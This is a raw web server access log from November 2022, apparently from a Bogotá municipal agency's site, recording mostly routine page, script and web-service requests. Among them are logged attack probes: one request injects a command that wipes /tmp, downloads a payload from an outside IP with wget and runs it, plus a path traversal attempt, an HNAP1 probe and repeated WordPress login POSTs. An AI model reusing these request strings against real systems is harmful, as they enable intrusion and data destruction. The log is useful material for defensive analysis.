186.145.91.234 - - [07/Nov/2022:19:28:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.145.91.234 - - [07/Nov/2022:19:28:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.145.91.234 - - [07/Nov/2022:19:28:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.145.91.234 - - [07/Nov/2022:19:28:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.145.91.234 - - [07/Nov/2022:19:28:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1564
186.145.91.234 - - [07/Nov/2022:19:28:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 107991
186.145.91.234 - - [07/Nov/2022:19:28:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.145.91.234 - - [07/Nov/2022:19:28:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.145.91.234 - - [07/Nov/2022:19:28:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.145.91.234 - - [07/Nov/2022:19:28:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.145.91.234 - - [07/Nov/2022:19:28:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.145.91.234 - - [07/Nov/2022:19:28:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.145.91.234 - - [07/Nov/2022:19:28:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.145.91.234 - - [07/Nov/2022:19:28:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5447
172.22.2.4 - - [07/Nov/2022:19:27:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [07/Nov/2022:19:29:17 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Nov/2022:19:31:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43502
201.245.192.253 - - [07/Nov/2022:19:31:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42207
201.245.192.253 - - [07/Nov/2022:19:31:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
193.142.146.35 - - [07/Nov/2022:19:33:13 -0500] "GET / HTTP/1.1" 200 319
193.142.146.35 - - [07/Nov/2022:19:33:14 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
173.255.244.136 - - [07/Nov/2022:19:33:16 -0500] "\x16\x03\x01" 400 226
173.255.244.136 - - [07/Nov/2022:19:33:20 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [07/Nov/2022:19:32:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Nov/2022:19:34:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:19:33:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51630
172.22.2.4 - - [07/Nov/2022:19:33:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
201.245.192.253 - - [07/Nov/2022:19:36:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:19:37:42 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [07/Nov/2022:19:37:51 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
216.245.221.92 - - [07/Nov/2022:19:39:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:19:38:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:19:39:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [07/Nov/2022:19:41:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43502
201.245.192.253 - - [07/Nov/2022:19:41:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42207
201.245.192.253 - - [07/Nov/2022:19:41:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [07/Nov/2022:19:44:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:19:44:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [07/Nov/2022:19:44:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
95.217.144.238 - - [07/Nov/2022:19:45:49 -0500] "-" 408 -
95.217.144.236 - - [07/Nov/2022:19:45:54 -0500] "-" 408 -
95.217.144.234 - - [07/Nov/2022:19:46:02 -0500] "-" 408 -
95.217.145.45 - - [07/Nov/2022:19:46:10 -0500] "-" 408 -
95.217.144.156 - - [07/Nov/2022:19:46:11 -0500] "-" 408 -
95.217.144.238 - - [07/Nov/2022:19:46:28 -0500] "-" 408 -
201.245.192.253 - - [07/Nov/2022:19:46:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
190.96.248.140 - - [07/Nov/2022:19:46:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.96.248.140 - - [07/Nov/2022:19:46:56 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.96.248.140 - - [07/Nov/2022:19:46:56 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.102.32.26 - - [07/Nov/2022:19:48:03 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18xDGZ2s9ydlM8/jb4u/oFPkPJoDj9rY7Oab2iNUR0M/VLPl29dm3dH&y=U2FsdGVkX18AZRaO+ZPGgr/4KupdEFlh0B7iEGyvEumJKRIgcZ3sjREEFmkhdbW7 HTTP/1.1" 200 30
186.102.32.26 - - [07/Nov/2022:19:48:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19vQKPmFbKZ+xmB53Qb44kNxB1XomUq6e4RyNQZMcnVSIvRwT/Nl7sdeKfAJSCcug2jp1bgR19MLzb8cd+3I3QBYn+lb3L2/V0=&u=U2FsdGVkX19aNutDKVoFySNsEkQr64ww8rICdcrTM2Q=&y=U2FsdGVkX18AZRaO+ZPGgr/4KupdEFlh0B7iEGyvEumJKRIgcZ3sjREEFmkhdbW7 HTTP/1.1" 200 97
186.102.32.26 - - [07/Nov/2022:19:48:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19wNDaatj6N3/k5lfvIoj53Ud9NGwh42JpoW4rUkQ5cmtS1Izv/rluwoqDNZMmKUsR+v2UJImQQaQS8OOW/qfr3JECT6KieExy/sEhMUJmXRZ3l8gtPLg8DHIckzwpuk0j7vEs+1tgI2FOEGKFwJnhh14EOoG1FK36ma8rSQTT5ZGn2jhi1DLHVHG/iLkrfDywveHgz6wsSshpQmG04w5tIdxphiGipSgHTwlvo6Ik0Bwla15ZsZG3+kMt24LsEtSADpwYm3XlZg9r62nhBWoO6P7A5tWmGGK3ZriNtY+4f/njJpCTnGXDJ08Zk42lBUczX5THooXIPvq9wtclHYv/SamqmDkPbE6FFqTq++jKa3T1MhRBpZh033ODngum6tSqAwev3utIMhrkwYKKBtft4UgktinnvUf2yBoYu2nrxCvxOSmt3o6kp6ircyifIWuu4ufbwlq7L/K6l0aMd63NrX1TY19xggDe5ho0K+QQXJayCHLGbkgSzOf2gUU6S+7FhsOZpxZ538G5RNAKl1jFsS2CkKW+xOyr733JPj0FD2hIN+pejxNxRee9KebReZnuEUx2NrDZheJgqq2j80dC4naKN2s23AY6NoteYAqwF/+pxkSauttJCiBk3AwVh9s9WRj1nwrhSzE8CWJHkxpKKSBRIn/EVZrRkqV+RMJJDVjSmOt0VihSTfks+wcRpIPYbrFlJCKzmcm3v3BXeSlUW4tCpMfK3oJbVuBa3YerSTbWsQXQ73aRhTdZvdN5cVVJ5IdHQpI2Wl3vOip/SrQT3tTrB2YAuKYhi3oNSlZBMKv91Cr9m+Uz8xHwi16fMNyAtVp3HjNmrJ/3/KF2wA4P3W6aH99DJR6JAZ1ZkhGv1CMxypgOb9Ykqcc0/FkSNAZd85piNO8AEgSVOoxwiHXaX1tZ0MBugKKvIz84GhSxn3Pmk+SlhmBbLrX6vGuh1P9LKdyDaVTz7g9OgNZ+kyeudDpDHmaPOk+tiZZq/LB0yD1QHLnndwoZAQlzz5icYjA4fqRJZGG2zq5g69oahQab89jvbKgPMvTpeLaL6IqS1w+5ZzQB/5PLwI2B61gkbAC3UWHq7BGAf3Sg1NFpHhCoehyj/uk9lfujbkWEdNNkaEucMZ+IR3sBqZukmz+rscdqNuEk37K2v4iaxrBjPXZrTCoUAORM41uswMzq40FNwsMAkGMOoQSOKIgwKaWoEZRAff1hqlyZIBFruVntOd36SoRheZCl/5XCb4EHTWPxXYvAl1B61eZgki9dh8ewdG9Ey2CajUVxKn8Dv9j7pZn6CkxMNvA8SWdzgs4o7XizX+zWuVdAW+HPflXJU2M3eyqTFYRVskkan3LVAL+xCKRpqAuY+/ACOnyEEk00n2+5vrPNztH6m1ErY6gfyLkfVRlLHx7zFHTah+7B8uqRSu6VDS9sKaTVanS4=&u=U2FsdGVkX19aNutDKVoFySNsEkQr64ww8rICdcrTM2Q=&y=U2FsdGVkX18AZRaO+ZPGgr/4KupdEFlh0B7iEGyvEumJKRIgcZ3sjREEFmkhdbW7 HTTP/1.1" 200 1619
186.102.32.26 - - [07/Nov/2022:19:48:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19JfIVYhRNS+ixXQu4iKdarchzW7jr9Q7UzUfxcmiG/JzWIhyhbM+UKTJUomMIVwVYN1kR28U1TPwSxL3+ZTEJ0udKkhPrNA1+WW72k7mEBcJ9yKeXqjVkosQNeU58QR354or5yK4VdIpE6ml3jHxPHRkk/feqJLFgDlDy7/1cZCD6aXY1+uBpQtJrnJFOK5ZPHJJr85HmbRNFofUjQMQUZvbzTw2ScraIuqmFnsHKRh7w8Ac3XVEMF//ySMtZtvrYNzooy+M5reQC+6Xk8qc1iW+az42XPzqfkTQ/1Ch40RayBBmiN5FDEU0liCRt2zLysSLE+BIvIWbrJdsNCqwTFIhxWzBYOEF8=&u=U2FsdGVkX19aNutDKVoFySNsEkQr64ww8rICdcrTM2Q=&y=U2FsdGVkX18AZRaO+ZPGgr/4KupdEFlh0B7iEGyvEumJKRIgcZ3sjREEFmkhdbW7 HTTP/1.1" 200 196
186.102.32.26 - - [07/Nov/2022:19:48:04 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18xDGZ2s9ydlM8/jb4u/oFPkPJoDj9rY7Oab2iNUR0M/VLPl29dm3dH HTTP/1.1" 200 30992
173.252.107.13 - - [07/Nov/2022:19:48:06 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
172.22.2.4 - - [07/Nov/2022:19:47:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:19:49:03 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
172.22.2.4 - - [07/Nov/2022:19:47:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
69.171.251.21 - - [07/Nov/2022:19:49:54 -0500] "GET /images/Reciclaton%20Nov%202022%20(1)%20(1).jpeg HTTP/1.1" 200 53811
201.245.192.253 - - [07/Nov/2022:19:51:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [07/Nov/2022:19:53:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:19:52:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:19:53:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
182.119.255.223 - - [07/Nov/2022:19:56:06 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [07/Nov/2022:19:56:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
192.241.207.208 - - [07/Nov/2022:19:56:41 -0500] "GET / HTTP/1.1" 200 319
179.33.241.34 - - [07/Nov/2022:19:56:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 406613
179.33.241.34 - - [07/Nov/2022:19:56:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 884169
172.22.2.4 - - [07/Nov/2022:19:57:44 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=7287&usuario=&sector=&fecha=2014&resuelve= HTTP/1.1" 200 626
216.245.221.92 - - [07/Nov/2022:19:58:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:19:58:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.244.55.34 - - [07/Nov/2022:20:01:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
173.244.55.34 - - [07/Nov/2022:20:01:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
173.244.55.34 - - [07/Nov/2022:20:01:08 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [07/Nov/2022:19:59:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [07/Nov/2022:20:01:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [07/Nov/2022:20:03:49 -0500] "HEAD / HTTP/1.1" 200 -
20.29.110.170 - - [07/Nov/2022:20:04:38 -0500] "GET /galeria/galeria/fotos/diaSC7Peq.jpg HTTP/1.1" 200 18357
185.119.81.100 - - [07/Nov/2022:20:05:13 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Nov/2022:20:05:14 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
40.77.167.57 - - [07/Nov/2022:20:05:22 -0500] "GET /Residuos/pinturas/files/guia_pinturas.pdf HTTP/1.1" 200 16736247
152.203.151.16 - - [07/Nov/2022:20:05:31 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
152.203.151.16 - - [07/Nov/2022:20:05:31 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
152.203.151.16 - - [07/Nov/2022:20:05:31 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
152.203.151.16 - - [07/Nov/2022:20:05:31 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
152.203.151.16 - - [07/Nov/2022:20:05:31 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
152.203.151.16 - - [07/Nov/2022:20:05:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
152.203.151.16 - - [07/Nov/2022:20:05:36 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
152.203.151.16 - - [07/Nov/2022:20:05:39 -0500] "POST /appsia/controlador HTTP/1.1" 200 16684
152.203.151.16 - - [07/Nov/2022:20:05:39 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
172.22.2.4 - - [07/Nov/2022:20:04:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Nov/2022:20:06:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:20:05:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
3.91.223.3 - - [07/Nov/2022:20:08:35 -0500] "GET /reciclaton-empresarial-mas-de-34-toneladas-fueron-recibidas-en-la-segunda-jornada-del-ano.html HTTP/1.1" 200 899
172.22.2.4 - - [07/Nov/2022:20:08:43 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 304 -
216.245.221.92 - - [07/Nov/2022:20:08:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:20:09:11 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ HTTP/1.1" 200 561
172.22.2.4 - - [07/Nov/2022:20:09:12 -0500] "GET /BLA/boletinlegal/icons/blank.gif HTTP/1.1" 404 1356
172.22.2.4 - - [07/Nov/2022:20:09:12 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1356
172.22.2.4 - - [07/Nov/2022:20:09:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ HTTP/1.1" 200 561
172.22.2.4 - - [07/Nov/2022:20:09:14 -0500] "GET /BLA/boletinlegal/icons/blank.gif HTTP/1.1" 404 1356
172.22.2.4 - - [07/Nov/2022:20:09:55 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-146-16.docx HTTP/1.1" 200 23021
172.22.2.4 - - [07/Nov/2022:20:09:56 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-146-16.docx HTTP/1.1" 200 23021
201.245.192.253 - - [07/Nov/2022:20:11:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:20:10:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:20:11:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [07/Nov/2022:20:13:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Nov/2022:20:16:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:20:16:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:20:17:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55630
216.245.221.92 - - [07/Nov/2022:20:18:49 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.162 - - [07/Nov/2022:20:20:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/1484.pdf HTTP/1.1" 304 -
186.84.91.95 - - [07/Nov/2022:20:20:59 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [07/Nov/2022:20:21:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43812
201.245.192.253 - - [07/Nov/2022:20:21:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42185
20.12.191.74 - - [07/Nov/2022:20:21:11 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/ficha-lisa-rayada.jpg HTTP/1.1" 200 253638
185.119.81.100 - - [07/Nov/2022:20:21:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Nov/2022:20:21:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [07/Nov/2022:20:21:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
186.29.183.122 - - [07/Nov/2022:20:22:13 -0500] "GET /reciclaton-empresarial-mas-de-34-toneladas-fueron-recibidas-en-la-segunda-jornada-del-ano.html HTTP/1.1" 200 899
185.119.81.100 - - [07/Nov/2022:20:22:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Nov/2022:20:22:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
207.46.13.11 - - [07/Nov/2022:20:23:03 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
172.22.2.4 - - [07/Nov/2022:20:22:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Nov/2022:20:23:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:20:22:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
201.245.192.253 - - [07/Nov/2022:20:26:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [07/Nov/2022:20:28:48 -0500] "HEAD / HTTP/1.1" 200 -
31.220.1.83 - - [07/Nov/2022:20:30:07 -0500] "GET ../../proc/ HTTP" 400 946
40.77.167.3 - - [07/Nov/2022:20:30:40 -0500] "GET /Publicaciones/2022EE19414.pdf HTTP/1.1" 404 227
40.77.167.3 - - [07/Nov/2022:20:30:41 -0500] "GET /Publicaciones/2022EE19414.pdf HTTP/1.1" 404 227
201.245.192.253 - - [07/Nov/2022:20:31:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43812
201.245.192.253 - - [07/Nov/2022:20:31:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42185
201.245.192.253 - - [07/Nov/2022:20:31:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
186.99.148.62 - - [07/Nov/2022:20:33:01 -0500] "GET /forest/login.do HTTP/1.1" 404 1120
216.245.221.92 - - [07/Nov/2022:20:33:48 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:20:34:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62772
201.245.192.253 - - [07/Nov/2022:20:36:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:20:37:55 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [07/Nov/2022:20:38:04 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
216.245.221.92 - - [07/Nov/2022:20:38:49 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.5 - - [07/Nov/2022:20:39:28 -0500] "GET /images/reciclaton-mayo-3-mayo.jpg HTTP/1.1" 200 278453
172.22.2.4 - - [07/Nov/2022:20:37:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:20:38:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [07/Nov/2022:20:41:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43812
201.245.192.253 - - [07/Nov/2022:20:41:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42185
201.245.192.253 - - [07/Nov/2022:20:41:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
179.33.241.34 - - [07/Nov/2022:20:41:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 577485
216.245.221.92 - - [07/Nov/2022:20:43:48 -0500] "HEAD / HTTP/1.1" 200 -
179.33.241.34 - - [07/Nov/2022:20:43:52 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 884169
172.22.2.4 - - [07/Nov/2022:20:43:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.33.241.34 - - [07/Nov/2022:20:45:25 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 577485
190.84.119.147 - - [07/Nov/2022:20:45:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 577485
172.22.2.4 - - [07/Nov/2022:20:44:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [07/Nov/2022:20:46:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
179.33.241.34 - - [07/Nov/2022:20:47:25 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 12235
179.33.241.34 - - [07/Nov/2022:20:47:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 85963
179.33.241.34 - - [07/Nov/2022:20:47:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 884169
40.77.51.82 - - [07/Nov/2022:20:47:50 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-cabezote-ni%C3%B1os.png HTTP/1.1" 200 64425
216.245.221.92 - - [07/Nov/2022:20:48:48 -0500] "HEAD / HTTP/1.1" 200 -
179.33.241.34 - - [07/Nov/2022:20:50:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 85963
179.33.241.34 - - [07/Nov/2022:20:50:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 85963
179.33.241.34 - - [07/Nov/2022:20:50:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 884169
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [07/Nov/2022:20:50:43 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
